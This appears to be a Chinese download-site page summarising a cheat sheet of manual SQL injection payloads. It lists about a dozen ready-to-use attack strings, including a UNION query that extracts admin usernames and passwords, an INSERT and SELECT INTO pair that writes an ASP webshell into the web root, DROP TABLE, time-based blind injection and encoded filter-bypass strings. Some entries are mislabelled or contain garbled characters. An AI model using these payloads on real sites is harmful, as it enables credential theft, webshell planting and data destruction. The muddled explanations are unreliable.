手工注入攻击语句总结

需积分: 5 0 下载量 51 浏览量 更新于2024-09-07 收藏 29KB TXT 举报
手工注入通用语句总结偏 手工注入是一种常见的 Web 应用程序安全漏洞,攻击者可以通过在输入字段中注入恶意代码来获取未经授权的访问权限。以下是手工注入通用语句总结偏的知识点: 1. **Union Injection**:攻击者可以使用 Union 语句来获取多个表的数据。例如,`union select top 11,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,username,19,20,21 from (select top 1 username,password from admin where 1=1 order by username) t`。 2. **Insert 语句**:攻击者可以使用 Insert 语句来插入恶意数据。例如,`insert into cmd(a) values (<%execute request(chr(35))%>)`。 3. **Select 语句**:攻击者可以使用 Select 语句来获取敏感数据。例如,`select * into [a] in D:\wwwroot\M3loee.asa;.xls excel 4.0; from cmd;`。 4. **Drop 语句**:攻击者可以使用 Drop 语句来删除表或数据库。例如,`drop table cmd;`。 5. **基于时间的盲注**:攻击者可以使用基于时间的盲注来获取敏感数据。例如,`and 1=1 and sleep(5)`。 6. **基于报错的盲注**:攻击者可以使用基于报错的盲注来获取敏感数据。例如,`and 1=2 union select 1,2,3`。 7. **JavaScript 注入**:攻击者可以使用 JavaScript 注入来获取 Cookie 等敏感信息。例如,`javascript:alert(document.cookie="id="+escape("123"));`。 8. **字符编码**:攻击者可以使用字符编码来 bypass 输入验证。例如,`%2525%2527%09and%091=1%23α룬%09ո`。 9. **逻辑运算符**:攻击者可以使用逻辑运算符来构造恶意查询。例如,`'and 1=1 and 1=2'`。 10. **OR 语句**:攻击者可以使用 OR 语句来构造恶意查询。例如,`'or 1=1 or 1=2'`。 11. **LIKE 语句**:攻击者可以使用 LIKE 语句来构造恶意查询。例如,`'or a='a'`。 12. **Cookie 注入**:攻击者可以使用 Cookie 注入来获取敏感信息。例如,`/ewebeditor.asp?id=1&style=standardcookiesע﷨`。 手工注入通用语句总结偏是一份非常危险的攻击工具,需要网站管理员和开发者高度警惕和防范。
2024-11-12 上传